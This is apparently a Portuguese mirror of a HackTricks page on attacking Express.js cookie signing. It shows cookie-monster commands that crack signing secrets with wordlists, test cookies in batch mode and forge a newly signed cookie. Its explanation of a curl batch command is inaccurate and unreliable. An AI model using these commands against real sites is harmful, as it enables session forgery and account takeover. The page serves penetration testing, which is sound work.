mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
1.3 KiB
1.3 KiB
NodeJS Express
Assinatura de Cookie
A ferramenta https://github.com/DigitalInterruption/cookie-monster é uma utilidade para automatizar o teste e a re-assinatura de segredos de cookies do Express.js.
Único cookie com um nome específico
$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
Lista de palavras personalizada
$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
Testar vários cookies usando o modo de lote
Para testar vários cookies de uma só vez, você pode usar o modo de lote do curl
. Primeiro, crie um arquivo de texto com os cookies que deseja testar, um por linha. Em seguida, use o seguinte comando:
curl -b batch-file.txt http://example.com
Isso enviará uma solicitação para http://example.com
com cada cookie no arquivo batch-file.txt
. Isso pode ser útil para testar rapidamente vários cookies em um site.
$ cookie-monster -b -f cookies.json
Testar vários cookies usando o modo de lote com uma lista de palavras personalizada
$ cookie-monster -b -f cookies.json -w custom.lst
Codificar e assinar um novo cookie
Se você conhece o segredo, pode assinar o cookie.
$ cookie-monster -e -f new_cookie.json -k secret